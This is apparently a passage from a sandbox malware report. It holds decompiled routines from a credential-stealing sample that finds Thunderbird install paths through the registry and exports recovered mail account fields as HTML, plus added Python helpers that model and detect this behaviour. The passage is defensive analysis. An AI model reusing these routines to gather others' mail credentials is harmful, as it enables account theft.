                                                                                                                                                    				void* _t93;
                                                                                                                                                    
                                                                                                                                                    				_t89 = __eax;
                                                                                                                                                    				_v1052 = 0;
                                                                                                                                                    				memset( &_v1051, 0, 0x104);
				_v788 = 0;                                  // best matching subkey name seen so far (starts empty)
				memset( &_v787, 0, 0xff);
				 *_t89 = 0;                                 // output path buffer starts empty
				// subcall 0040EB3F wraps RegOpenKeyExA; 0x80000002 is HKEY_LOCAL_MACHINE, _v8 receives the handle
				_t45 = E0040EB3F(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
				_t91 = _t90 + 0x24;
				if(_t45 != 0) {
					// key not present: go straight to the fallback locations
					L12:
					strcpy(_t89,  &_v1052);                 // best directory found in the registry, if any
					if( *_t89 == 0) {
						// fallback 1: %programfiles%\Mozilla Thunderbird
						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
						if(E0040F3BA(_t89) == 0) {          // E0040F3BA validates a candidate path (body not shown here)
							 *_t89 = 0;
						}
						if( *_t89 == 0) {
							// fallback 2: path produced by E00406172 (not resolved on this page)
							E00406172(_t89);
							if(E0040F3BA(_t89) == 0) {
								 *_t89 = 0;
							}
							if( *_t89 == 0) {
								// fallback 3: the current working directory
								GetCurrentDirectoryA(0x104, _t89);
								if(E0040F3BA(_t89) == 0) {
									 *_t89 = 0;
								}
							}
						}
					}
					return 0 |  *_t89 != 0x00000000;      // nonzero when some directory was accepted
				} else {
					_v268 = 0;                              // current subkey name
					memset( &_v267, 0, 0xff);
					_v12 = 0;                               // RegEnumKeyExA index
					_t59 = E0040EC05(_v8, 0,  &_v268);      // subcall 0040EC05 wraps RegEnumKeyExA
					_t92 = _t91 + 0x18;
					while(_t59 == 0) {
						// _mbsnbicmp(&_v268, "mozilla", 7): subkey name begins with "mozilla", case-insensitive
						_push(7);
						_t60 =  &_v268;
						_push("mozilla");
						_push(_t60);
						L00411642();
						_t93 = _t92 + 0xc;
						if(_t60 == 0) {
							_v532 = 0;                      // PathToExe value data
							memset( &_v531, 0, 0x104);
							_v2076 = 0;                     // "<subkey>\bin" subkey path
							memset( &_v2075, 0, 0x3ff);
							// _snprintf(&_v2076, 0x3ff, "%s\\bin", &_v268)
							_push( &_v268);
							_push("%s\\bin");
							_push(0x3ff);
							_push( &_v2076);
							L00411648();
							// subcall 0040EBC1 (not expanded here) gets the open key, "<subkey>\bin", the value name
							// PathToExe and a 0x104-byte buffer: evidently a registry string read into _v532
							E0040EBC1(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
							// _mbsrchr(&_v532, '\\'): cut at the last backslash, leaving the install directory
							_t71 =  &_v532;
							_push(0x5c);
							_push(_t71);
							L0041164E();
							_t93 = _t93 + 0x44;
							if(_t71 != 0) {
								 *_t71 = 0;
							}
							if(_v532 != 0 && E0040F3BA( &_v532) != 0) {
								// _mbsicmp(&_v268, &_v788) > 0: plain case-insensitive string order on the
								// subkey names decides which install wins, not a numeric version comparison
								_push( &_v788);
								_t75 =  &_v268;
								L004115C4();
								_t84 = _t75;
								if(_t75 > 0) {
									strcpy( &_v1052,  &_v532); // remember the directory
									strcpy( &_v788,  &_v268);  // and the subkey name it came from
									_t93 = _t93 + 0x10;
								}
							}
						}
						_v12 = _v12 + 1;
						_t59 = E0040EC05(_v8, _v12,  &_v268);
						_t92 = _t93 + 0xc;
					}
					RegCloseKey(_v8);
					goto L12;
				}
			}
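The routine above settles on a Mozilla/Thunderbird program directory in a fixed order: the highest-sorting HKLM\SOFTWARE\Mozilla subkey whose bin\PathToExe points at an existing directory, then %programfiles%\Mozilla Thunderbird, then a helper not resolved on this page, then the current directory. The following Python model of that order is an added example, not code from the report or from the sample: the registry, environment, current directory and path-existence check are all injected as constructed inputs so it runs offline, the unresolved E00406172 step is omitted, and the names locate_mozilla_dir, fake_exists and the FAKE_* data are this example's own. It keeps the decompiled code's _mbsicmp semantics, a case-insensitive string comparison of subkey names rather than a numeric version comparison, so a "9.0" key outranks a "10.0" key.

```python
"""Model of the Mozilla/Thunderbird install-directory lookup seen in the decompiled routine.

Added example, not code from the report or the sample. The registry, environment,
current directory and path-existence check are all injected so it runs offline.
"""

from typing import Callable, Dict, Optional


def locate_mozilla_dir(
    mozilla_key: Optional[Dict[str, Dict[str, str]]],
    exists: Callable[[str], bool],
    environ: Dict[str, str],
    cwd: str,
) -> str:
    """Return the directory the sample would settle on, or "" if every candidate fails.

    mozilla_key models HKLM\\SOFTWARE\\Mozilla as {subkey_name: {value_name: data}}, the
    values being those of the "<subkey>\\bin" subkey; None models RegOpenKeyExA failing.
    exists stands in for the sample's E0040F3BA path check.
    """
    best_name = ""   # _v788: subkey name of the best candidate so far
    best_dir = ""    # _v1052: directory of the best candidate so far

    if mozilla_key is not None:
        for subkey, bin_values in mozilla_key.items():      # RegEnumKeyExA loop
            # _mbsnbicmp(subkey, "mozilla", 7) == 0: first seven bytes, case-insensitive
            if subkey[:7].lower() != "mozilla":
                continue
            path = bin_values.get("PathToExe", "")          # "<subkey>\bin" -> PathToExe
            cut = path.rfind("\\")                          # _mbsrchr(path, '\\')
            if cut != -1:
                path = path[:cut]                           # drop the executable name
            # _mbsicmp(subkey, best_name) > 0: the subkey whose NAME sorts highest wins.
            # This is a string comparison, so "... 9.0" beats "... 10.0".
            if path and exists(path) and subkey.lower() > best_name.lower():
                best_dir, best_name = path, subkey

    out = best_dir
    if not out:
        # ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird"): an unset
        # variable is left unexpanded, which then fails the existence check
        prog = environ.get("programfiles")
        out = (prog if prog is not None else "%programfiles%") + "\\Mozilla Thunderbird"
        if not exists(out):
            out = ""
    # The sample's next fallback, E00406172, is not resolved on the page and is omitted here.
    if not out:
        out = cwd                                           # GetCurrentDirectoryA
        if not exists(out):
            out = ""
    return out


# Constructed registry snapshot (not from a real host) mirroring the key layout the sample reads.
FAKE_MOZILLA_KEY = {
    "Mozilla Thunderbird 78.14.0 (x86 en-US)": {"PathToExe": r"C:\Apps\TB78\thunderbird.exe"},
    "Mozilla Thunderbird 91.5.0 (x86 en-US)": {"PathToExe": r"C:\Program Files\Mozilla Thunderbird\thunderbird.exe"},
    "mozilla.org": {},                                      # passes the prefix test, has no PathToExe
    "Other Vendor": {"PathToExe": r"C:\Other\other.exe"},   # rejected by the prefix test
}
# Constructed set of directories that "exist" on the modelled host.
FAKE_EXISTING_DIRS = {r"C:\Apps\TB78", r"C:\Program Files\Mozilla Thunderbird", r"C:\Users\victim\Desktop"}


def fake_exists(path: str) -> bool:
    """Stand-in for the sample's path check, backed by the constructed set above."""
    return path in FAKE_EXISTING_DIRS


if __name__ == "__main__":
    desktop = r"C:\Users\victim\Desktop"
    print(locate_mozilla_dir(FAKE_MOZILLA_KEY, fake_exists, {}, desktop))
    print(locate_mozilla_dir(None, fake_exists, {"programfiles": r"C:\Program Files"}, desktop))
    print(locate_mozilla_dir(None, fake_exists, {}, desktop))
```

Read against the listing, the observable sequence on a host is: an open of HKLM\SOFTWARE\Mozilla, a read of PathToExe under each Mozilla* subkey's bin subkey, and, only when none of those yields a usable directory, an expansion of %programfiles%\Mozilla Thunderbird and a GetCurrentDirectoryA call. That ordering is what to look for when attributing registry telemetry from this sample to its mail-credential collection.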
Listing address range: 0x0040f449 to 0x0040f64a

APIs
• memset.MSVCRT ref: 0040F459
• memset.MSVCRT ref: 0040F471
  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
• memset.MSVCRT ref: 0040F4A9
  • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
• _mbsnbicmp.MSVCRT ref: 0040F4D7
• memset.MSVCRT ref: 0040F4F6
• memset.MSVCRT ref: 0040F50E
• _snprintf.MSVCRT ref: 0040F52B
• _mbsrchr.MSVCRT ref: 0040F555
• _mbsicmp.MSVCRT ref: 0040F589
• strcpy.MSVCRT(?,?,?), ref: 0040F5A2
• strcpy.MSVCRT(?,?,?,?,?), ref: 0040F5B5
• RegCloseKey.ADVAPI32(0040F699), ref: 0040F5E0
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F5EE
• ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040F600
• GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F62D
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
• String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
• API String ID: 3269028891-3267283505
• Opcode ID: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
• Instruction ID: bd4ffbb0b4c73fbe97c341744dc0c87608cd01b58ef3e3991875b3aaf34b88fb
• Opcode Fuzzy Hash: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
• Instruction Fuzzy Hash: 5251A77284425DBADB31D7A18C46EDA7ABC9F14344F0404FBF645E2152EA788FC98B68
Uniqueness

Uniqueness Score: -1.00%
C-Code - Quality: 95%
			E0040F126(void* __edi, char* _a4, char* _a8) {
				int _v8;
				void _v263;
				char _v264;
				void _v519;
				char _v520;
				intOrPtr _t32;
				void* _t58;
				char* _t60;
				void* _t61;
				void* _t62;

				_t58 = __edi;
				_v264 = 0;
				memset( &_v263, 0, 0xfe);
                                                                                                                                                    				_v520 = 0;
                                                                                                                                                    				memset( &_v519, 0, 0xfe);
                                                                                                                                                    				_t62 = _t61 + 0x18;
                                                                                                                                                    				_v8 = 1;
                                                                                                                                                    				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
                                                                                                                                                    					_v8 = 0;
                                                                                                                                                    				}
                                                                                                                                                    				_t60 = _a4;
                                                                                                                                                    				 *_t60 = 0;
                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                    					strcpy(_t60, "<font");
                                                                                                                                                    					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                                                                                    					if(_t32 > 0) {
                                                                                                                                                    						sprintf( &_v264, " size=\"%d\"", _t32);
                                                                                                                                                    						strcat(_t60,  &_v264);
                                                                                                                                                    						_t62 = _t62 + 0x14;
                                                                                                                                                    					}
                                                                                                                                                    					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                                                                                    					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                                                                                    						sprintf( &_v264, " color=\"#%s\"", E0040F071(_t33,  &_v520));
                                                                                                                                                    						strcat(_t60,  &_v264);
                                                                                                                                                    					}
                                                                                                                                                    					strcat(_t60, ">");
                                                                                                                                                    				}
                                                                                                                                                    				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                                                    					strcat(_t60, "<b>");
                                                                                                                                                    				}
                                                                                                                                                    				strcat(_t60, _a8);
                                                                                                                                                    				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                                                    					strcat(_t60, "</b>");
                                                                                                                                                    				}
                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                    					strcat(_t60, "</font>");
                                                                                                                                                    				}
                                                                                                                                                    				return _t60;
                                                                                                                                                    			}

                                                                                                                                                    0x0040f126
                                                                                                                                                    0x0040f141
                                                                                                                                                    0x0040f147
                                                                                                                                                    0x0040f155
                                                                                                                                                    0x0040f15b
                                                                                                                                                    0x0040f160
                                                                                                                                                    0x0040f167
                                                                                                                                                    0x0040f16e
                                                                                                                                                    0x0040f175
                                                                                                                                                    0x0040f175
                                                                                                                                                    0x0040f17b
                                                                                                                                                    0x0040f17e
                                                                                                                                                    0x0040f180
                                                                                                                                                    0x0040f188
                                                                                                                                                    0x0040f18d
                                                                                                                                                    0x0040f194
                                                                                                                                                    0x0040f1a3
                                                                                                                                                    0x0040f1b0
                                                                                                                                                    0x0040f1b5
                                                                                                                                                    0x0040f1b5
                                                                                                                                                    0x0040f1b8
                                                                                                                                                    0x0040f1be
                                                                                                                                                    0x0040f1da
                                                                                                                                                    0x0040f1e7
                                                                                                                                                    0x0040f1ec
                                                                                                                                                    0x0040f1f5
                                                                                                                                                    0x0040f1fb
                                                                                                                                                    0x0040f1ff
                                                                                                                                                    0x0040f207
                                                                                                                                                    0x0040f20d
                                                                                                                                                    0x0040f212
                                                                                                                                                    0x0040f21c
                                                                                                                                                    0x0040f224
                                                                                                                                                    0x0040f22a
                                                                                                                                                    0x0040f22e
                                                                                                                                                    0x0040f236
                                                                                                                                                    0x0040f23c
                                                                                                                                                    0x0040f242

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040F147
                                                                                                                                                    • memset.MSVCRT ref: 0040F15B
                                                                                                                                                    • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F188
                                                                                                                                                    • sprintf.MSVCRT ref: 0040F1A3
                                                                                                                                                    • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F1B0
                                                                                                                                                    • sprintf.MSVCRT ref: 0040F1DA
                                                                                                                                                    • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F1E7
                                                                                                                                                    • strcat.MSVCRT(?,00413DF4,?,?,?,?,?), ref: 0040F1F5
                                                                                                                                                    • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F207
                                                                                                                                                    • strcat.MSVCRT(?,00409631,?,?,?,?,?), ref: 0040F212
                                                                                                                                                    • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F224
                                                                                                                                                    • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F236
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcat$memsetsprintf$strcpy
                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                    • API String ID: 1662040868-1996832678
                                                                                                                                                    • Opcode ID: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                                                                                                                    • Instruction ID: 418722c3eca89b157b40b8f143ba28d640e3e929850bbea17599129c1cdb8299
                                                                                                                                                    • Opcode Fuzzy Hash: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                                                                                                                    • Instruction Fuzzy Hash: 3F31D5B2841615BAC720AB55ED82DCAB36C9F10364F6041BFF215B31C2DA7C9FC48B98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040AF17(void* __eax, intOrPtr _a4) {
                                                                                                                                                    				char _v271;
                                                                                                                                                    				char _v532;
                                                                                                                                                    				intOrPtr _v536;
                                                                                                                                                    				char _v540;
                                                                                                                                                    				void _v803;
                                                                                                                                                    				char _v804;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				char* _t47;
                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                    				WINDOWPLACEMENT* _t73;
                                                                                                                                                    				void* _t75;
                                                                                                                                                    				char* _t83;
                                                                                                                                                    				struct HWND__* _t84;
                                                                                                                                                    				intOrPtr _t88;
                                                                                                                                                    				int _t90;
                                                                                                                                                    
                                                                                                                                                    				_t75 = __eax;
                                                                                                                                                    				_v804 = 0;
                                                                                                                                                    				memset( &_v803, 0, 0x104);
                                                                                                                                                    				GetModuleFileNameA(0,  &_v804, 0x104);
                                                                                                                                                    				_t47 = strrchr( &_v804, 0x2e);
                                                                                                                                                    				if(_t47 != 0) {
                                                                                                                                                    					 *_t47 = 0;
                                                                                                                                                    				}
                                                                                                                                                    				strcat( &_v804, ".cfg");
                                                                                                                                                    				_v536 = _a4;
                                                                                                                                                    				_v540 = 0x413bdc;
                                                                                                                                                    				_v532 = 0;
                                                                                                                                                    				_v271 = 0;
                                                                                                                                                    				strcpy( &_v532,  &_v804);
                                                                                                                                                    				strcpy( &_v271, "General");
                                                                                                                                                    				_t88 =  *((intOrPtr*)(_t75 + 0x36c));
                                                                                                                                                    				 *((intOrPtr*)(_v540 + 4))("ShowGridLines", _t88 + 4, 0);
                                                                                                                                                    				 *((intOrPtr*)(_v540 + 8))("SaveFilterIndex", _t88 + 8, 0);
                                                                                                                                                    				 *((intOrPtr*)(_v540 + 4))("AddExportHeaderLine", _t88 + 0xc, 0);
                                                                                                                                                    				 *((intOrPtr*)(_v540 + 4))("MarkOddEvenRows", _t88 + 0x10, 0);
                                                                                                                                                    				_t67 = _v536;
                                                                                                                                                    				_a4 = _t67;
                                                                                                                                                    				_t90 = 0x2c;
                                                                                                                                                    				if(_t67 != 0) {
                                                                                                                                                    					_t84 =  *(_t75 + 0x108);
                                                                                                                                                    					if(_t84 != 0) {
                                                                                                                                                    						_t73 = _t75 + 0x128;
                                                                                                                                                    						_t73->length = _t90;
                                                                                                                                                    						GetWindowPlacement(_t84, _t73);
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				_t83 =  &_v540;
                                                                                                                                                    				 *((intOrPtr*)(_v540 + 0xc))("WinPos", _t75 + 0x128, _t90);
                                                                                                                                                    				if(_a4 == 0) {
                                                                                                                                                    					E00401896(_t75);
                                                                                                                                                    				}
                                                                                                                                                    				return E00408671( *((intOrPtr*)(_t75 + 0x370)), _t83,  &_v540);
                                                                                                                                                    			}

                                                                                                                                                    0x0040af29
                                                                                                                                                    0x0040af35
                                                                                                                                                    0x0040af3c
                                                                                                                                                    0x0040af4d
                                                                                                                                                    0x0040af5c
                                                                                                                                                    0x0040af65
                                                                                                                                                    0x0040af67
                                                                                                                                                    0x0040af67
                                                                                                                                                    0x0040af76
                                                                                                                                                    0x0040af7e
                                                                                                                                                    0x0040af92
                                                                                                                                                    0x0040af9c
                                                                                                                                                    0x0040afa3
                                                                                                                                                    0x0040afaa
                                                                                                                                                    0x0040afbb
                                                                                                                                                    0x0040afc0
                                                                                                                                                    0x0040afdf
                                                                                                                                                    0x0040aff8
                                                                                                                                                    0x0040b011
                                                                                                                                                    0x0040b02a
                                                                                                                                                    0x0040b02d
                                                                                                                                                    0x0040b037
                                                                                                                                                    0x0040b03a
                                                                                                                                                    0x0040b03b
                                                                                                                                                    0x0040b03d
                                                                                                                                                    0x0040b045
                                                                                                                                                    0x0040b047
                                                                                                                                                    0x0040b04f
                                                                                                                                                    0x0040b051
                                                                                                                                                    0x0040b051
                                                                                                                                                    0x0040b045
                                                                                                                                                    0x0040b06a
                                                                                                                                                    0x0040b070
                                                                                                                                                    0x0040b076
                                                                                                                                                    0x0040b078
                                                                                                                                                    0x0040b078
                                                                                                                                                    0x0040b092

APIs
• memset.MSVCRT ref: 0040AF3C
• GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040AF4D
• strrchr.MSVCRT ref: 0040AF5C
• strcat.MSVCRT(00000000,.cfg), ref: 0040AF76
• strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040AFAA
• strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040AFBB
• GetWindowPlacement.USER32(?,?), ref: 0040B051
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
• String ID: .cfg$0@$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
• API String ID: 1301239246-2014360536
• Opcode ID: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
• Instruction ID: 2fe98fd5fda5e8878426aecce951da02ffd08f2862891724b98557ab80592e30
• Opcode Fuzzy Hash: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
• Instruction Fuzzy Hash: 3A413972940118ABCB61DB54CC88FDAB7BCEB58304F4441AAF509E7191DB74ABC5CBA4
Uniqueness
Uniqueness Score: -1.00%
C-Code - Quality: 80%
// Vertical HTML export of one recovered item: opens a <table>, writes one <tr>
// per list-view column (bold column name, then the value) and closes it. The
// literal strings here, together with the .cfg keys used by the neighbouring
// function (WinPos, ShowGridLines, AddExportHeaderLine, ...), are the export and
// config code of the NirSoft password-recovery tools (MailPassView /
// WebBrowserPassView) that the report's Yara rules flag; the dump is the image
// at 0x400000 of the hollowed vbc.exe (process 15).
// __ebx: list/report object (vtable at *__ebx, column count at +0x20, display
//        order at +0x24, column flags at +0x34, scratch buffers at +0x4c/+0x50/
//        +0x54/+0x58); _a4: output sink passed to E00405EFD; _a8: the item being
//        exported (an object with its own vtable).
E00409482(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
	signed int _v8;
	intOrPtr _v12;
	intOrPtr _v16;
	signed int _v20;
	signed int _v24;
	signed int _v28;
	void _v79;
	char _v80;
	void _v131;
	char _v132;
	void _v183;
	char _v184;
	char _v236;
	void _v491;
	char _v492;
	void* __edi;
	void* _t83;
	void* _t100;
	char* _t103;
	intOrPtr* _t120;
	signed int _t121;
	char _t139;
	signed int _t152;
	signed int _t153;
	signed int _t156;
	intOrPtr* _t157;
	void* _t158;
	void* _t160;

	_t120 = __ebx;
	_v492 = 0;
	memset( &_v491, 0, 0xfe);
	// 12 dwords plus one movsb = the 49-byte row format string including its NUL.
	_t121 = 0xc;
	memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
	asm("movsb");
	_t156 = 0;
	_v132 = 0;
	memset( &_v131, 0, 0x31);
	_v184 = 0;
	memset( &_v183, 0, 0x31);
	_v80 = 0;
	memset( &_v79, 0, 0x31);
	_t160 = _t158 + 0x3c;
	_t83 =  *((intOrPtr*)( *__ebx + 0x10))();           // row background colour, -1 = none
	_v12 =  *((intOrPtr*)(__ebx + 0x1b4));               // column descriptor table, 0x14 bytes per column
	if(_t83 != 0xffffffff) {
		// E0040F071 formats a colour value as text for the HTML attribute
		sprintf( &_v132, " bgcolor=\"%s\"", E0040F071(_t83,  &_v492));
		_t160 = _t160 + 0x14;
	}
	E00405EFD(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
	_v8 = _t156;                                          // column index
	if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {          // column count
		while(1) {
			_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);   // display position -> column id
			if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
				strcpy( &_v80, " nowrap");                // column flagged no-wrap
			}
			// colours default to -1 (none) before the object fills in cell attributes
			_v28 = _v28 | 0xffffffff;
			_v24 = _v24 | 0xffffffff;
			_v20 = _v20 | 0xffffffff;
			_v16 = _t156;
			_t157 = _a8;
			 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
			E0040F071(_v28,  &_v184);                     // cell colour as text
			// item's text for column _t152 into +0x4c, post-processed into +0x50
			E0040F09D( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
			 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
			_t100 =  *((intOrPtr*)( *_t120 + 0x14))();   // column-name colour, -1 = plain
			_t153 = _t152 * 0x14;
			if(_t100 == 0xffffffff) {
				strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));   // column name (descriptor +0x10)
			} else {
				_push( *(_t153 + _v12 + 0x10));
				_push(E0040F071(_t100,  &_v492));
				sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
				_t160 = _t160 + 0x10;
			}
			// an empty value, or one starting with a space, gets "&nbsp;" appended
			// so the cell is still drawn
			_t103 =  *(_t120 + 0x50);
			_t139 =  *_t103;
			if(_t139 == 0 || _t139 == 0x20) {
				strcat(_t103, "&nbsp;");
			}
			E0040F126( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
			// row = format(bgcolor attribute, column name, cell colour, nowrap flag, value)
			sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
			E00405EFD(_a4,  *(_t120 + 0x4c));
			_t160 = _t160 + 0x2c;
			_v8 = _v8 + 1;
			if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
				goto L14;
			}
			_t156 = 0;
		}
	}
	L14:
	E00405EFD(_a4, "</table><p>");
	return E00405EFD(_a4, 0x412b1c);
}
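The export routine fixes two things an analyst can act on: the literal strings the component carries (the row format string, the table tags and the .cfg keys listed under String ID above), and the exact shape of the HTML report it writes, one <table> per recovered item with one unterminated <tr> per field. The Python below is an added example written for this page, not code from the sample, from NirSoft or from Joe Sandbox. It reuses those strings to scan a memory dump for the component and to parse a captured report back into field/value pairs. The column names in the sample report, the SAMPLE_DUMP bytes, the evidence threshold in looks_like_export_routine and the latin-1 decoding are assumptions of the example.

```python
"""Triage helpers for the HTML export routine E00409482 decompiled above.

Example code for this page, not code from the sample, NirSoft or Joe Sandbox.
scan_indicators() finds the routine's string constants in a dump or unpacked
image; parse_vertical_report() turns the HTML the routine emits back into
field/value dicts. SAMPLE_DUMP and SAMPLE_REPORT are constructed.
"""
import re
from typing import Dict, List

# Literal strings from the decompiled routine and the report's String ID line.
ROW_FORMAT = b'<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n'
TABLE_OPEN = b'<table border="1" cellpadding="5">\r\n'
TABLE_CLOSE = b'</table><p>'
FONT_FORMAT = b'<font color="%s">%s</font>'
CFG_KEYS = [b'WinPos', b'ShowGridLines', b'SaveFilterIndex',
            b'MarkOddEvenRows', b'AddExportHeaderLine']

INDICATORS: Dict[str, bytes] = {
    'html_row_format': ROW_FORMAT,
    'html_table_open': TABLE_OPEN,
    'html_table_close': TABLE_CLOSE,
    'html_font_format': FONT_FORMAT,
}
INDICATORS.update({'cfg_' + k.decode(): k for k in CFG_KEYS})


def scan_indicators(buf: bytes) -> Dict[str, List[int]]:
    """Map each indicator present in buf to every offset where it occurs."""
    hits: Dict[str, List[int]] = {}
    for name, needle in INDICATORS.items():
        pos = buf.find(needle)
        while pos >= 0:
            hits.setdefault(name, []).append(pos)
            pos = buf.find(needle, pos + 1)
    return hits


def looks_like_export_routine(hits: Dict[str, List[int]]) -> bool:
    """Evidence threshold (this example's choice): the row format string, the
    table tag and at least three of the .cfg keys must all be present."""
    cfg_hits = sum(1 for name in hits if name.startswith('cfg_'))
    return 'html_row_format' in hits and 'html_table_open' in hits and cfg_hits >= 3


# The routine closes no <td>/<tr>: a row ends at its CRLF, an item at </table>.
_TABLE_RE = re.compile(rb'<table border="1" cellpadding="5">\r?\n(.*?)</table>', re.DOTALL)
_ROW_RE = re.compile(rb'<tr><td[^>]*><b>(.*?)</b><td[^>]*>(.*?)\r?\n', re.DOTALL)
_FONT_RE = re.compile(rb'</?font[^>]*>')


def parse_vertical_report(html: bytes) -> List[Dict[str, str]]:
    """One dict per <table>; keys are the bold column names with any <font>
    wrapper dropped. The routine appends "&nbsp;" when a value is empty or
    starts with a space, so a bare "&nbsp;" reads back as the empty string."""
    items: List[Dict[str, str]] = []
    for table in _TABLE_RE.findall(html):
        fields: Dict[str, str] = {}
        for header, value in _ROW_RE.findall(table):
            name = _FONT_RE.sub(b'', header).decode('latin-1')  # 8-bit text assumed
            text = value.decode('latin-1')
            if text == '&nbsp;':
                text = ''
            elif text.endswith('&nbsp;'):
                text = text[:-len('&nbsp;')]
            fields[name] = text
        items.append(fields)
    return items


def _row(header: bytes, value: bytes, colour: bytes = b'FFFFFF') -> bytes:
    # Fill the recovered format string in the routine's own argument order:
    # (bgcolor attribute, column name, cell colour, nowrap flag, value).
    return ROW_FORMAT % (b' bgcolor="#E0E0E0"', header, colour, b' nowrap', value)


def _table(rows: List[bytes]) -> bytes:
    return TABLE_OPEN + b''.join(rows) + TABLE_CLOSE + b'\r\n'


# Constructed report; column names are illustrative, not the tool's real ones.
SAMPLE_REPORT = _table([
    _row(b'Name', b'Work mail'),
    _row(b'Application', b'Microsoft Outlook'),
    _row(b'Email', b'jdoe@example.com'),
    _row(b'Server', b'mail.example.com'),
    _row(b'User', b'jdoe'),
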